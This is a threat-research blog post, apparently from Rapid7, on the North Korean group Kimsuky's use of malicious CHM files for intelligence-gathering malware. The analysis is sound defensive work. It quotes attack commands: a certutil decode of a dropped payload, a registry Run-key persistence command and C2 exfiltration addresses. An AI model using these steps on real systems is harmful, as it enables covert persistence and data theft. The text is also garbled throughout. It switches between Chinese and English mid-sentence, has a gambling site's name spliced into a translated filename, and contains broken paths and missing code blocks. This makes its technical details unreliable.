更新APT剧本:来自Kimsuky威胁演员组的故事

最后更新于2024年3月21日星期四13:20:04 GMT

合著者是Christiaan Beek和Raj Samani

Within Rapid7 Labs 我们持续跟踪和监控威胁组织. This is one of our key areas of focus as we work to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify evolving tactics from threat groups in what is an unceasing game of cat and mouse.

Our team recently ran across some interesting activity that we believe is the work of the Kimsuky 威胁演员组织，也被称为黑女妖或铊. 起源于朝鲜，至少从2012年开始活跃, Kimsuky主要专注于情报收集. 据悉，该组织的目标是韩国政府机构, 与朝鲜半岛统一进程有关的个人, 以及与该政权利益相关的各个领域的全球专家. In recent years, Kimsuky的活动也扩展到整个亚太地区，影响到日本, Vietnam, Thailand, etc.

Through our research, we saw an updated playbook that underscores Kimsuky’s efforts to bypass modern security measures. Their evolution in tactics, techniques, and procedures (TTPs) underscores the dynamic nature of cyber espionage and the continuous arms race between threat actors and defenders.

In this blog we will detail new techniques that we have observed used by this actor group over the recent months. We believe that sharing these evolving techniques gives defenders the latest insights into measures required to protect their assets.

Anatomy of the Attack

Let’s begin by highlighting where we started our analysis of Kimsuky and how the more we investigated, the more we discovered — to the point where we believe we observed a new wave of attacks by this actor.

在确定目标后, typically we would anticipate the reconnaissance phase to initiate in an effort to identify methods to allow access into the target. 既然金苏基的重点是情报收集, gaining access needs to remain undetected; subsequently, 入侵的目的是不触发警报.

Over the years, 我们观察到这个群体的方法发生了变化, 从武器化的Office文件开始, ISO files, and beginning last year, 滥用快捷文件(LNK文件). 通过将这些LNK文件伪装成良性文档或文件, 攻击者欺骗用户执行它们. PowerShell commands, or even full binaries, are hidden in the LNK files — all hidden for the end-user who doesn’t detect this at the surface.

Our latest findings lead us to observations that we believe are Kimsuky using CHM files which are delivered in several ways, 作为ISO|VHD|ZIP或RAR文件的一部分. The reason they would use this approach is that such containers have the ability to pass the first line of defense and then the CHM file will be executed.

CHM files, or Compiled HTML Help files, 是微软开发的在线帮助文件的专有格式. 它们包含一组HTML页面和一个目录, index, 以及全文搜索功能. Essentially, CHM files are used to display help documentation in a structured, navigable format. 它们是使用Microsoft HTML帮助车间编译的，可以包含文本, images, and hyperlinks, similar to web pages, 都打包成一个单独的压缩文件 .chm extension.

虽然最初是为帮助文档设计的, CHM文件也被用于恶意目的, 比如散布恶意软件, 因为它们可以在打开时执行JavaScript. CHM files are a small archive that can be extracted with unzipping tools to extract the content of the CHM file for analysis.

我们分析中的第一个场景可以可视化如下:

The Nuclear Lure

在跟踪活动时，我们首先发现了一个引起我们注意的CHM文件.

在受控环境中分析该文件, 我们观察到CHM文件包含以下文件和结构:

文件名的语言是韩语. 在翻译软件的帮助下，以下是文件名:

• 《ladbrokes立博官网》揭示了北韩的核战略.html
• Incomplete.html
• 朝鲜使用核武器的因素和类型.html
• 朝鲜核危机升级模型与核使用决定因素.html
• Introduction.html
• Previous research review.html
• 研究背景与目的.html

这些HTML文件链接到主HTML文件' home '.Html ' -我们稍后将返回此文件.

每种文件类型都有其独特的特征, 从文件取证的角度来看，我们来看看文件的头文件:

0412作为语言ID的值为“Korean - Korea”。. This can be translated to mean the Windows operating system that was used to create this CHM file was using the Korean language.

当CHM文件被执行时，它将显示以下内容:

右窗格中的页面是“主页”.html’ file. 这个页面包含了一段有趣的代码:

The provided code snippet is an example of using HTML and ActiveX to execute arbitrary commands on a Windows machine, 通常用于恶意目的. The value assigned to a ‘Button’ contains a command line with Base64 code in it as another obfuscation technique and is followed by a living-off-the-land technique, 从而在受害者的系统上创建持久性以运行内容.

让我们将其分解并理解演员在做什么:

1. Base64编码的VBScript执行(T1059.003):

• 回声T24gRXJyb3IgUmVzdW1lIE5leHQ...: 这部分将base64编码的字符串回显到文件中. 该字符串经过解码后就是VBScript代码. VBScript被设计成在受害者的机器上执行. 解码后的Base64值为:

2. Saving to a .dat File:

• >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat": 返回的Base64字符串被重定向并保存到 .当前用户的链接目录下的dat文件. 文件名似乎是随机生成或混淆的，以避免容易检测.

3. Decoding the .dat File:

• start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat”“% USERPROFILE % \ \ MXFhejJ3c3gzZWRjA的链接.vbs":它使用certutil实用程序(一个合法的Windows工具)来解码base64编码的 .dat file back into a .vbs (VBScript) file. /MIN标志开始的过程最小化，以减少怀疑.

4. 通过注册表修改实现持久性(T1547).001)

• :start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs" /f: This adds a new entry to the Windows Registry under the Run key for the current user (HKCU stands for HKEY_CURRENT_USER). This registry path is used by Windows to determine which programs should run automatically at startup. 该命令确保每次用户登录时都运行解码的VBScript, 在受感染的系统上实现持久性.

但是从URL下载的内容，解码并写入该VBS文件? The URL of the Command and Control Server is hosting an HTML page that contains VBS code:

分析代码，它在受害者的机器上做了几件事:

The function ‘SyInf()’ collects basic system information using WMI (Windows Management Instrumentation) and constructs a string with all these details. What is gathered:

• 计算机名称，所有者，制造商，型号，系统类型.
• 操作系统详细信息，版本，构建号，总可见内存.
• 处理器细节，包括标题和时钟速度.

代码中的其他函数收集系统上正在运行的进程, recent Word files, 并列出特定文件夹的目录和文件. 在我们的示例中，参与者对Downloads文件夹的内容感兴趣.

从代码中收集到所请求的信息后, 它全部以Base64格式编码, stored in the file ‘info.Txt’，并被泄露到远程服务器:

ui = "00701111.000webhostapp.com/wp-extra"

发送信息后，C2使用以下消息进行响应:

这个C2服务器仍然处于活动状态，尽管我们从2023年9月开始就看到了活动, 我们还观察到了2024年的活动.

New Campaign Discovered

在“偷窃代码”中旋转一些独特的字符串，并寻找更多的CHM文件, 我们发现了更多的文件——一些也可以追溯到2023年下半年, but also 2024 hits.

在VirusTotal中，我们发现了以下文件:

The file is a VBS script and it contains similar code to what we described earlier on the information gathering script above. Many components are the same, with small differences in what type of data is being gathered.

最大的区别是不同的C2服务器，这是有道理的. 下面是VBS脚本运行时的完整路径，并将路径进行了连接:

hxxp://gosiweb.gosiclass[.] com/m/gnu/convert/html/com/list.php?query=6

The modus operandi and reusing of code and tools are showing that the threat actor is actively using and refining/reshaping its techniques and tactics to gather intelligence from victims.

Still More? 是的，发现了另一种方法

使用先前发现的CHM文件的特征, 我们制定了雅拉内部的狩猎规则, 从中我们发现了以下CHM文件:

在这个特殊的例子中，是倍数 .存在VBS文件和VBS脚本。

以类似的方式，目录中的HTML文件包含隐藏代码:

style="visibility:hidden;">

执行CHM文件后，将删除目录中的所有文件 C: \ \ \公共\ \图书馆\ \用户 directory and starts running. 首先使用“\2034923”创建持久性计划任务.bat” file:

VBS脚本会先创建一个Service，再创建另一个Service .Bat文件被执行，每个文件都有不同的函数.

The “9583423.Bat”脚本将从系统中收集信息并将其存储在文本文件中:

在上面的代码中，当收集信息时，该文件由' 1295049 '调用.bat’ script, which contains the Powershell code to setup the connection to the C2 server with the right path, Base64 encode the stream, and transfer:

结合前面的代码 .bat文件和下面的代码，创建到C2的路径:

hxxps://niscarea[.]com/in.php?cn=[base64]&fn=[DateTime]

收集到的包含系统信息的文件将被Base64编码, zipped and sent to the C2. 发送后，文件将从本地系统中删除.

The sys.txt file will contain information about the system of the victim such as OS, CPU architecture, etc. 以下是内容的一个简短示例:

这种攻击的整体流程可以在这个可视化中简化:

Attack Prevalence

Since this is an active campaign, tracking prevalence is based at the time of this writing. However, Rapid7 Labs telemetry enables us to confirm that we have identified targeted attacks against entities based in South Korea. Moreover, as we apply our approach to determine attribution such as the overlap in code and tactics, 我们有一定的信心把这次行动归功于Kimsuky集团.

所有的ioc都可以在我们的网站上免费获得 Rapid7 Labs repository here.

Rapid7 Customers

InsightIDR and 管理检测和响应 (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity related to these techniques and research:

持久性-运行键由Reg添加.exe

Suspicious Process - HH.exe Spawns Child Process

可疑进程- CHM文件运行CMD.exe to Run Certutil

持久化- vbs脚本添加到注册表运行键中

*In threat research terms, “moderate confidence” means that we have a significant amount of evidence that the activity we are observing is similar to what we have observed from a specific group or actor in the past; however, 总是有可能有人在模仿你的行为. 因此，我们使用“中等”而不是“高”信心.